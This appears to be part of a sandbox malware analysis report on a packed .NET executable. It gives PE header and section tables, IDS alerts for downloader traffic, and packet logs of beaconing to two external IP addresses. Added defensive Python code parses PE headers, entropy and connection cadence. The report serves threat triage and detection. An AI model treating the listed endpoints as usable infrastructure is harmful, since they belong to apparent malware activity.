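    return [name for bit, name in sorted(table.items()) if value & bit]


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_pe32(data: bytes) -> dict:
    """Extract the header fields a report lists from a PE32 image (PE32+ is rejected)."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (20 bytes)
    machine, _nsec, stamp, _, _, _optsize, chars = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24  # optional header follows the 4-byte signature + 20-byte COFF header
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("not a PE32 optional header")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    os_major, os_minor, _img_major, _img_minor, ss_major, ss_minor = struct.unpack_from(
        "<HHHHHH", data, opt + 40)
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    n_dirs = struct.unpack_from("<I", data, opt + 92)[0]
    clr_rva, clr_size = (0, 0)
    if n_dirs > 14:  # data directory 14 is IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR (CLR header)
        clr_rva, clr_size = struct.unpack_from("<II", data, opt + 96 + 14 * 8)
    return {
        "machine": machine,
        "timestamp": datetime.fromtimestamp(stamp, tz=timezone.utc).strftime(
            "%a %b %d %H:%M:%S %Y UTC"),
        "entrypoint_va": image_base + entry_rva,
        "image_base": image_base,
        "subsystem": {2: "windows gui", 3: "windows cui"}.get(subsystem, str(subsystem)),
        "file_characteristics": flag_names(chars, FILE_CHARACTERISTICS),
        "dll_characteristics": flag_names(dll_chars, DLL_CHARACTERISTICS),
        "os_version": (os_major, os_minor),
        "subsystem_version": (ss_major, ss_minor),
        "is_dotnet": clr_size > 0,
    }


def build_sample_header() -> bytes:
    """Constructed PE32 header carrying the report's values; no sections, no code."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                       # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0x67611ABB, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                       # PE32 magic
    struct.pack_into("<I", opt, 16, 0xDEA06)                    # AddressOfEntryPoint (RVA)
    struct.pack_into("<I", opt, 28, 0x400000)                   # ImageBase
    struct.pack_into("<HHHHHH", opt, 40, 4, 0, 4, 0, 4, 0)      # OS / image / subsystem versions
    struct.pack_into("<HH", opt, 68, 2, 0x8540)                 # GUI subsystem, DllCharacteristics
    struct.pack_into("<I", opt, 92, 16)                         # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 14 * 8, 0x2008, 72)       # CLR runtime header present
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


def entropy_hint(entropy: float) -> str:
    """Triage reading of whole-file entropy under the assumed threshold."""
    if entropy >= ENTROPY_PACKED_HINT:
        return "high: packed or encrypted payload likely"
    return "unremarkable"


if __name__ == "__main__":
    for key, value in parse_pe32(build_sample_header()).items():
        print(f"{key}: {value}")
    print("uniform bytes:", shannon_entropy(bytes(range(256))), entropy_hint(8.0))
```

The point of the comparison is that header values are cheap to verify: a timestamp, entrypoint or DllCharacteristics set that does not match the file you were handed means you are looking at a different build than the one analysed. A whole-file entropy of 7.65 on a 907 KB .NET assembly, as reported here, is what you expect when most of the image is an encrypted or compressed payload rather than IL, which is consistent with the ".NET source code contains potential unpacker" signature.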
                                                                                                      Instruction
jmp dword ptr [00402000h]    ; native .NET entry stub: indirect jump through the import address table to mscoree!_CorExeMain, which then locates the managed entry point from the CLR header
add byte ptr [eax], al       ; 00 00: the bytes after the stub are zero padding, which the disassembler renders as this instruction repeated
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xde9b2          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xe0000          0x608         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xe2000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0xdc724          0x54          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0xdca0c       0xdcc00   b355b06e2f6c526301f98fa9c35b2d3b  False     0.8021272030719139  data       7.655601029073059    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0xe0000          0x608         0x800     ddb1f1ce18116f9b87d75a2b775d8aff  False     0.3359375           data       3.4231883972846804   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xe2000          0xc           0x200     21038a50b0ab68924d1027218fa76baf  False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA      Size   Type                                                                              Language  Country  ZLIB Complexity
RT_VERSION   0xe0090  0x378  data                                                                                                 0.43355855855855857
RT_MANIFEST  0xe0418  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                    0.5489795918367347
DLL          Import
mscoree.dll  _CorExeMain
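The tables above (data directories, section table with entropy, resources, the single mscoree.dll import) are the static facts a triage script reads first: an executable .text section at entropy 7.66 means the real payload is packed or encrypted and only exists after unpacking in memory, and a non-zero COM_DESCRIPTOR directory together with a lone _CorExeMain import is the shape of a .NET stub that hands control to the runtime. The following is an added example, not Joe Sandbox's code and not code from the sample: a stdlib-only Python parser that rebuilds those columns (including "Is in Section") from the PE headers, computes per-section Shannon entropy and flags those signals. It runs on a constructed PE whose header values copy the report's tables; the section contents are synthetic filler, so the entropy values it prints are not the sample's.

```python
import hashlib
import math
import struct
from collections import Counter

DIR_NAMES = ["EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC",
             "DEBUG", "COPYRIGHT", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT",
             "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED"]
IMAGE_SCN_MEM_EXECUTE = 0x20000000


def shannon_entropy(buf):
    """Bits per byte: 0.0 for empty or constant input, close to 8.0 for random bytes."""
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values()) if n else 0.0


def parse_pe(data):
    """Return ({directory name: (rva, size)}, [section dicts]) for a PE32 or PE32+ image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    pe = struct.unpack_from("<I", data, 0x3C)[0]            # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, pe + 4)
    opt = pe + 24                                           # optional header follows the COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:                                      # PE32
        ndirs_off, dirs_off = opt + 92, opt + 96
    elif magic == 0x20B:                                    # PE32+: ImageBase is 8 bytes wider
        ndirs_off, dirs_off = opt + 108, opt + 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    ndirs = struct.unpack_from("<I", data, ndirs_off)[0]
    dirs = {DIR_NAMES[i]: struct.unpack_from("<II", data, dirs_off + 8 * i)
            for i in range(min(ndirs, 16))}
    sections = []
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr, _, _, _, _, flags = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize,
                         "rawsize": rawsize, "flags": flags,
                         "entropy": shannon_entropy(data[rawptr:rawptr + rawsize])})
    return dirs, sections


def section_for_rva(rva, sections):
    """The report's 'Is in Section' column: the section whose virtual range holds the RVA."""
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return s["name"]
    return None


def triage(data, entropy_threshold=7.0):
    """Static findings a first-pass triage raises on this layout."""
    dirs, sections = parse_pe(data)
    findings = ["executable section %s has entropy %.2f: packed or encrypted payload"
                % (s["name"], s["entropy"]) for s in sections
                if s["flags"] & IMAGE_SCN_MEM_EXECUTE and s["entropy"] > entropy_threshold]
    clr_rva = dirs["COM_DESCRIPTOR"][0]
    if clr_rva:   # non-zero CLR header: managed code, expect a lone mscoree.dll!_CorExeMain import
        findings.append(".NET assembly: CLR header at RVA 0x%x in %s"
                        % (clr_rva, section_for_rva(clr_rva, sections)))
    if dirs["SECURITY"] == (0, 0):
        findings.append("unsigned: Authenticode (SECURITY) directory is empty")
    return findings


def build_sample_pe():
    """Constructed PE32 whose header values copy the report's tables (directory RVAs, section
    VAs, virtual sizes, characteristics). Raw section contents are small synthetic fillers:
    chained SHA-256 digests stand in for an encrypted payload, so this is not the sample and
    not a loadable image, only something the parser above can be run on."""
    dirs = {1: (0xDE9B2, 0x4F), 2: (0xE0000, 0x608), 5: (0xE2000, 0xC),
            6: (0xDC724, 0x54), 12: (0x2000, 0x8), 14: (0x2008, 0x48)}
    payload = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(128))   # 0x1000 bytes
    secs = [(b".text", 0xDCA0C, 0x2000, 0x1000, 0x60000020, payload),
            (b".rsrc", 0x608, 0xE0000, 0x800, 0x40000040, b"VS_VERSION_INFO\0" * 0x80),
            (b".reloc", 0xC, 0xE2000, 0x200, 0x42000040, bytes(0x200))]
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                 # e_lfanew: PE header right after DOS header
    coff = struct.pack("<HHIIIHH", 0x14C, len(secs), 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                   # PE32 magic
    struct.pack_into("<I", opt, 92, 16)                     # NumberOfRvaAndSizes
    for i, (rva, size) in dirs.items():
        struct.pack_into("<II", opt, 96 + 8 * i, rva, size)
    headers, bodies, rawptr = dos + b"PE\0\0" + coff + opt, b"", 0x200
    for name, vsize, va, rawsize, flags, body in secs:
        headers += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), vsize, va, rawsize,
                               rawptr, 0, 0, 0, 0, flags)
        bodies += body.ljust(rawsize, b"\0")
        rawptr += rawsize
    return bytes(headers.ljust(0x200, b"\0") + bodies)


if __name__ == "__main__":
    sample = build_sample_pe()
    dirs, sections = parse_pe(sample)
    for name, (rva, size) in dirs.items():
        if rva:
            print("%-14s 0x%-6x 0x%-4x %s" % (name, rva, size, section_for_rva(rva, sections)))
    print(*triage(sample), sep="\n")
```

Seven bits per byte is the usual cut-off for calling an executable section packed; IL emitted by the C# compiler normally sits well below it, so 7.66 on a managed .text is the loader-plus-encrypted-blob pattern rather than ordinary code, which is consistent with the unpacker and process-injection signatures in the overview. The parser deliberately reads only the headers and section bodies, so it is safe to point at a live sample without executing anything.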
Timestamp                        SID      Signature                                          Severity  Source IP    Source Port  Dest IP         Dest Port  Protocol
2024-12-17T08:33:50.274773+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.7  49702        193.122.130.0   80         TCP
2024-12-17T08:33:53.068957+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.7  49702        193.122.130.0   80         TCP
2024-12-17T08:33:54.680510+0100  2803305  ETPRO MALWARE Common Downloader Header Pattern H   3         192.168.2.7  49706        172.67.177.134  443        TCP
2024-12-17T08:33:55.975234+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.7  49713        193.122.130.0   80         TCP
2024-12-17T08:33:58.850266+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.7  49715        193.122.130.0   80         TCP
2024-12-17T08:34:03.417453+0100  2803305  ETPRO MALWARE Common Downloader Header Pattern H   3         192.168.2.7  49718        172.67.177.134  443        TCP
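The IDS alerts above fire on plain HTTP to 193.122.130.0:80 (ET Pro "Common Downloader Header Pattern UH") interleaved with TLS to 172.67.177.134:443 ("Pattern H"), and the TCP packet list that follows shows the same two endpoints being reconnected to every few seconds on fresh ephemeral ports. The following is an added example, not Joe Sandbox code and not code from the sample: it parses rows written in the packet table's column order (timestamp, source port, destination port, source IP, destination IP, single-space separated), groups packets into flows and measures connection cadence per server endpoint, which is the cheapest beaconing check one can run on a sandbox packet list. The embedded rows are copied from the table (the first client packet of each connection plus one server reply to exercise direction handling); which side is the server is inferred from the lower port number, an assumption that holds for this capture.

```python
import re
from datetime import datetime
from statistics import median

# Rows copied from the report's TCP packet table: first packet of each client connection
# (the 192.168.2.7 side) plus one server reply. Column order is the table's own.
ROWS = """\
Dec 17, 2024 08:33:48.656141043 CET 49702 80 192.168.2.7 193.122.130.0
Dec 17, 2024 08:33:48.775815010 CET 80 49702 193.122.130.0 192.168.2.7
Dec 17, 2024 08:33:50.968368053 CET 49703 443 192.168.2.7 172.67.177.134
Dec 17, 2024 08:33:53.019340038 CET 49706 443 192.168.2.7 172.67.177.134
Dec 17, 2024 08:33:54.686763048 CET 49713 80 192.168.2.7 193.122.130.0
Dec 17, 2024 08:33:55.928097010 CET 49714 443 192.168.2.7 172.67.177.134
Dec 17, 2024 08:33:57.589314938 CET 49715 80 192.168.2.7 193.122.130.0
Dec 17, 2024 08:33:58.807724953 CET 49716 443 192.168.2.7 172.67.177.134
Dec 17, 2024 08:34:00.479341984 CET 49717 80 192.168.2.7 193.122.130.0
Dec 17, 2024 08:34:01.759088039 CET 49718 443 192.168.2.7 172.67.177.134
Dec 17, 2024 08:34:03.424010038 CET 49721 80 192.168.2.7 193.122.130.0
Dec 17, 2024 08:34:04.641522884 CET 49723 443 192.168.2.7 172.67.177.134
"""

ROW_RE = re.compile(r"^(\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(\d+) CET (\d+) (\d+) (\S+) (\S+)$")


def parse_rows(text):
    """Yield (time, src_ip, src_port, dst_ip, dst_port). The report's nanosecond
    fraction is cut to microseconds, which is all datetime can carry."""
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        stamp, frac, sport, dport, sip, dip = m.groups()
        t = datetime.strptime("%s.%s" % (stamp, frac[:6]), "%b %d, %Y %H:%M:%S.%f")
        yield t, sip, int(sport), dip, int(dport)


def flows(packets):
    """Group packets into flows keyed (client_ip, client_port, server_ip, server_port).
    Assumption: the lower port is the server side (true here: 80/443 vs ephemeral)."""
    table = {}
    for t, sip, sport, dip, dport in packets:
        key = (sip, sport, dip, dport) if sport > dport else (dip, dport, sip, sport)
        f = table.setdefault(key, {"start": t, "packets": 0})
        f["start"] = min(f["start"], t)
        f["packets"] += 1
    return table


def cadence(flow_table, min_connections=4, tolerance=0.25):
    """Per server endpoint: connection count, median gap between connection starts
    (seconds) and the share of gaps within +/-tolerance of that median. An endpoint
    is called periodic when most gaps cluster around the median."""
    starts = {}
    for (_, _, sip, sport), f in flow_table.items():
        starts.setdefault((sip, sport), []).append(f["start"])
    report = {}
    for endpoint, ts in starts.items():
        if len(ts) < min_connections:
            report[endpoint] = {"connections": len(ts), "periodic": False}
            continue
        ts.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
        med = median(gaps)
        regular = sum(1 for g in gaps if abs(g - med) <= tolerance * med) / len(gaps)
        report[endpoint] = {"connections": len(ts), "median_gap": round(med, 2),
                            "regular": round(regular, 2), "periodic": regular >= 0.6}
    return report


if __name__ == "__main__":
    for endpoint, r in cadence(flows(parse_rows(ROWS))).items():
        print("%s:%d" % endpoint, r)
```

On these rows both endpoints come back as periodic with a median gap of about 2.9 s: five HTTP connections to 193.122.130.0 and six TLS connections to 172.67.177.134 inside 16 seconds, which fits a loop that polls the HTTP host and then the TLS host on each pass. For a production detection the minimum connection count and tolerance need tuning against benign pollers such as update checks and telemetry, and the server-side inference should use the SYN direction rather than port ordering.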
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Dec 17, 2024 08:33:48.656141043 CET  49702        80         192.168.2.7     193.122.130.0
Dec 17, 2024 08:33:48.775815010 CET  80           49702      193.122.130.0   192.168.2.7
Dec 17, 2024 08:33:48.776305914 CET  49702        80         192.168.2.7     193.122.130.0
Dec 17, 2024 08:33:48.776305914 CET  49702        80         192.168.2.7     193.122.130.0
Dec 17, 2024 08:33:48.896127939 CET  80           49702      193.122.130.0   192.168.2.7
Dec 17, 2024 08:33:49.875155926 CET  80           49702      193.122.130.0   192.168.2.7
Dec 17, 2024 08:33:49.911330938 CET  49702        80         192.168.2.7     193.122.130.0
Dec 17, 2024 08:33:50.031393051 CET  80           49702      193.122.130.0   192.168.2.7
Dec 17, 2024 08:33:50.231628895 CET  80           49702      193.122.130.0   192.168.2.7
Dec 17, 2024 08:33:50.274772882 CET  49702        80         192.168.2.7     193.122.130.0
Dec 17, 2024 08:33:50.968368053 CET  49703        443        192.168.2.7     172.67.177.134
Dec 17, 2024 08:33:50.968429089 CET  443          49703      172.67.177.134  192.168.2.7
Dec 17, 2024 08:33:50.968497038 CET  49703        443        192.168.2.7     172.67.177.134
Dec 17, 2024 08:33:50.980408907 CET  49703        443        192.168.2.7     172.67.177.134
Dec 17, 2024 08:33:50.980441093 CET  443          49703      172.67.177.134  192.168.2.7
Dec 17, 2024 08:33:52.223654032 CET  443          49703      172.67.177.134  192.168.2.7
Dec 17, 2024 08:33:52.223742008 CET  49703        443        192.168.2.7     172.67.177.134
Dec 17, 2024 08:33:52.240547895 CET  49703        443        192.168.2.7     172.67.177.134
Dec 17, 2024 08:33:52.240570068 CET  443          49703      172.67.177.134  192.168.2.7
Dec 17, 2024 08:33:52.240890980 CET  443          49703      172.67.177.134  192.168.2.7
Dec 17, 2024 08:33:52.297657967 CET  49703        443        192.168.2.7     172.67.177.134
Dec 17, 2024 08:33:52.339337111 CET  443          49703      172.67.177.134  192.168.2.7
Dec 17, 2024 08:33:52.666181087 CET  443          49703      172.67.177.134  192.168.2.7
Dec 17, 2024 08:33:52.666241884 CET  443          49703      172.67.177.134  192.168.2.7
Dec 17, 2024 08:33:52.666315079 CET  49703        443        192.168.2.7     172.67.177.134
Dec 17, 2024 08:33:52.672358990 CET  49703        443        192.168.2.7     172.67.177.134
Dec 17, 2024 08:33:52.677329063 CET  49702        80         192.168.2.7     193.122.130.0
Dec 17, 2024 08:33:52.797209978 CET  80           49702      193.122.130.0   192.168.2.7
Dec 17, 2024 08:33:53.016958952 CET  80           49702      193.122.130.0   192.168.2.7
Dec 17, 2024 08:33:53.019340038 CET  49706        443        192.168.2.7     172.67.177.134
Dec 17, 2024 08:33:53.019368887 CET  443          49706      172.67.177.134  192.168.2.7
Dec 17, 2024 08:33:53.019490004 CET  49706        443        192.168.2.7     172.67.177.134
Dec 17, 2024 08:33:53.019829035 CET  49706        443        192.168.2.7     172.67.177.134
Dec 17, 2024 08:33:53.019845009 CET  443          49706      172.67.177.134  192.168.2.7
Dec 17, 2024 08:33:53.068957090 CET  49702        80         192.168.2.7     193.122.130.0
Dec 17, 2024 08:33:54.235225916 CET  443          49706      172.67.177.134  192.168.2.7
Dec 17, 2024 08:33:54.237714052 CET  49706        443        192.168.2.7     172.67.177.134
Dec 17, 2024 08:33:54.237746000 CET  443          49706      172.67.177.134  192.168.2.7
Dec 17, 2024 08:33:54.680474997 CET  443          49706      172.67.177.134  192.168.2.7
Dec 17, 2024 08:33:54.680541039 CET  443          49706      172.67.177.134  192.168.2.7
Dec 17, 2024 08:33:54.680653095 CET  49706        443        192.168.2.7     172.67.177.134
Dec 17, 2024 08:33:54.681637049 CET  49706        443        192.168.2.7     172.67.177.134
Dec 17, 2024 08:33:54.685148001 CET  49702        80         192.168.2.7     193.122.130.0
Dec 17, 2024 08:33:54.686763048 CET  49713        80         192.168.2.7     193.122.130.0
Dec 17, 2024 08:33:54.805306911 CET  80           49702      193.122.130.0   192.168.2.7
Dec 17, 2024 08:33:54.806294918 CET  49702        80         192.168.2.7     193.122.130.0
Dec 17, 2024 08:33:54.806509972 CET  80           49713      193.122.130.0   192.168.2.7
Dec 17, 2024 08:33:54.806613922 CET  49713        80         192.168.2.7     193.122.130.0
Dec 17, 2024 08:33:54.806826115 CET  49713        80         192.168.2.7     193.122.130.0
Dec 17, 2024 08:33:54.926472902 CET  80           49713      193.122.130.0   192.168.2.7
Dec 17, 2024 08:33:55.926506996 CET  80           49713      193.122.130.0   192.168.2.7
Dec 17, 2024 08:33:55.928097010 CET  49714        443        192.168.2.7     172.67.177.134
Dec 17, 2024 08:33:55.928126097 CET  443          49714      172.67.177.134  192.168.2.7
Dec 17, 2024 08:33:55.928389072 CET  49714        443        192.168.2.7     172.67.177.134
Dec 17, 2024 08:33:55.928672075 CET  49714        443        192.168.2.7     172.67.177.134
Dec 17, 2024 08:33:55.928683996 CET  443          49714      172.67.177.134  192.168.2.7
Dec 17, 2024 08:33:55.975234032 CET  49713        80         192.168.2.7     193.122.130.0
Dec 17, 2024 08:33:57.138197899 CET  443          49714      172.67.177.134  192.168.2.7
Dec 17, 2024 08:33:57.140100956 CET  49714        443        192.168.2.7     172.67.177.134
Dec 17, 2024 08:33:57.140115976 CET  443          49714      172.67.177.134  192.168.2.7
Dec 17, 2024 08:33:57.583380938 CET  443          49714      172.67.177.134  192.168.2.7
Dec 17, 2024 08:33:57.583426952 CET  443          49714      172.67.177.134  192.168.2.7
Dec 17, 2024 08:33:57.583579063 CET  49714        443        192.168.2.7     172.67.177.134
Dec 17, 2024 08:33:57.584146023 CET  49714        443        192.168.2.7     172.67.177.134
Dec 17, 2024 08:33:57.588152885 CET  49713        80         192.168.2.7     193.122.130.0
Dec 17, 2024 08:33:57.589314938 CET  49715        80         192.168.2.7     193.122.130.0
Dec 17, 2024 08:33:57.708210945 CET  80           49713      193.122.130.0   192.168.2.7
Dec 17, 2024 08:33:57.708328009 CET  49713        80         192.168.2.7     193.122.130.0
Dec 17, 2024 08:33:57.708971977 CET  80           49715      193.122.130.0   192.168.2.7
Dec 17, 2024 08:33:57.709105015 CET  49715        80         192.168.2.7     193.122.130.0
Dec 17, 2024 08:33:57.709274054 CET  49715        80         192.168.2.7     193.122.130.0
Dec 17, 2024 08:33:57.828984022 CET  80           49715      193.122.130.0   192.168.2.7
Dec 17, 2024 08:33:58.806240082 CET  80           49715      193.122.130.0   192.168.2.7
Dec 17, 2024 08:33:58.807724953 CET  49716        443        192.168.2.7     172.67.177.134
Dec 17, 2024 08:33:58.807760000 CET  443          49716      172.67.177.134  192.168.2.7
Dec 17, 2024 08:33:58.807833910 CET  49716        443        192.168.2.7     172.67.177.134
Dec 17, 2024 08:33:58.808104992 CET  49716        443        192.168.2.7     172.67.177.134
Dec 17, 2024 08:33:58.808118105 CET  443          49716      172.67.177.134  192.168.2.7
Dec 17, 2024 08:33:58.850265980 CET  49715        80         192.168.2.7     193.122.130.0
Dec 17, 2024 08:34:00.017544031 CET  443          49716      172.67.177.134  192.168.2.7
Dec 17, 2024 08:34:00.019973040 CET  49716        443        192.168.2.7     172.67.177.134
Dec 17, 2024 08:34:00.019996881 CET  443          49716      172.67.177.134  192.168.2.7
Dec 17, 2024 08:34:00.464212894 CET  443          49716      172.67.177.134  192.168.2.7
Dec 17, 2024 08:34:00.464271069 CET  443          49716      172.67.177.134  192.168.2.7
Dec 17, 2024 08:34:00.464334011 CET  49716        443        192.168.2.7     172.67.177.134
Dec 17, 2024 08:34:00.464886904 CET  49716        443        192.168.2.7     172.67.177.134
Dec 17, 2024 08:34:00.479341984 CET  49717        80         192.168.2.7     193.122.130.0
Dec 17, 2024 08:34:00.599065065 CET  80           49717      193.122.130.0   192.168.2.7
Dec 17, 2024 08:34:00.599230051 CET  49717        80         192.168.2.7     193.122.130.0
Dec 17, 2024 08:34:00.599440098 CET  49717        80         192.168.2.7     193.122.130.0
Dec 17, 2024 08:34:00.719105005 CET  80           49717      193.122.130.0   192.168.2.7
Dec 17, 2024 08:34:01.695772886 CET  80           49717      193.122.130.0   192.168.2.7
Dec 17, 2024 08:34:01.740904093 CET  49717        80         192.168.2.7     193.122.130.0
Dec 17, 2024 08:34:01.759088039 CET  49718        443        192.168.2.7     172.67.177.134
Dec 17, 2024 08:34:01.759128094 CET  443          49718      172.67.177.134  192.168.2.7
Dec 17, 2024 08:34:01.759181023 CET  49718        443        192.168.2.7     172.67.177.134
Dec 17, 2024 08:34:01.759712934 CET  49718        443        192.168.2.7     172.67.177.134
Dec 17, 2024 08:34:01.759737968 CET  443          49718      172.67.177.134  192.168.2.7
Dec 17, 2024 08:34:02.970083952 CET  443          49718      172.67.177.134  192.168.2.7
Dec 17, 2024 08:34:02.971951008 CET  49718        443        192.168.2.7     172.67.177.134
Dec 17, 2024 08:34:02.971987963 CET  443          49718      172.67.177.134  192.168.2.7
Dec 17, 2024 08:34:03.417474985 CET  443          49718      172.67.177.134  192.168.2.7
Dec 17, 2024 08:34:03.417541027 CET  443          49718      172.67.177.134  192.168.2.7
Dec 17, 2024 08:34:03.417675018 CET  49718        443        192.168.2.7     172.67.177.134
Dec 17, 2024 08:34:03.418179035 CET  49718        443        192.168.2.7     172.67.177.134
Dec 17, 2024 08:34:03.422792912 CET  49717        80         192.168.2.7     193.122.130.0
Dec 17, 2024 08:34:03.424010038 CET  49721        80         192.168.2.7     193.122.130.0
Dec 17, 2024 08:34:03.543050051 CET  80           49717      193.122.130.0   192.168.2.7
Dec 17, 2024 08:34:03.543128014 CET  49717        80         192.168.2.7     193.122.130.0
Dec 17, 2024 08:34:03.544073105 CET  80           49721      193.122.130.0   192.168.2.7
Dec 17, 2024 08:34:03.544282913 CET  49721        80         192.168.2.7     193.122.130.0
Dec 17, 2024 08:34:03.544388056 CET  49721        80         192.168.2.7     193.122.130.0
Dec 17, 2024 08:34:03.664200068 CET  80           49721      193.122.130.0   192.168.2.7
Dec 17, 2024 08:34:04.640063047 CET  80           49721      193.122.130.0   192.168.2.7
Dec 17, 2024 08:34:04.641522884 CET  49723        443        192.168.2.7     172.67.177.134
Dec 17, 2024 08:34:04.641611099 CET  443          49723      172.67.177.134  192.168.2.7
Dec 17, 2024 08:34:04.641695976 CET  49723        443        192.168.2.7     172.67.177.134
Dec 17, 2024 08:34:04.642004013 CET  49723        443        192.168.2.7     172.67.177.134
Dec 17, 2024 08:34:04.642038107 CET  443          49723      172.67.177.134  192.168.2.7
Dec 17, 2024 08:34:04.694175959 CET  49721        80         192.168.2.7     193.122.130.0
Dec 17, 2024 08:34:05.851910114 CET  443          49723      172.67.177.134  192.168.2.7
Dec 17, 2024 08:34:05.854206085 CET  49723        443        192.168.2.7     172.67.177.134
Dec 17, 2024 08:34:05.854242086 CET  443          49723      172.67.177.134  192.168.2.7
Dec 17, 2024 08:34:06.675565958 CET  443          49723      172.67.177.134  192.168.2.7
                                                                                                      Dec 17, 2024 08:34:06.675647974 CET44349723172.67.177.134192.168.2.7
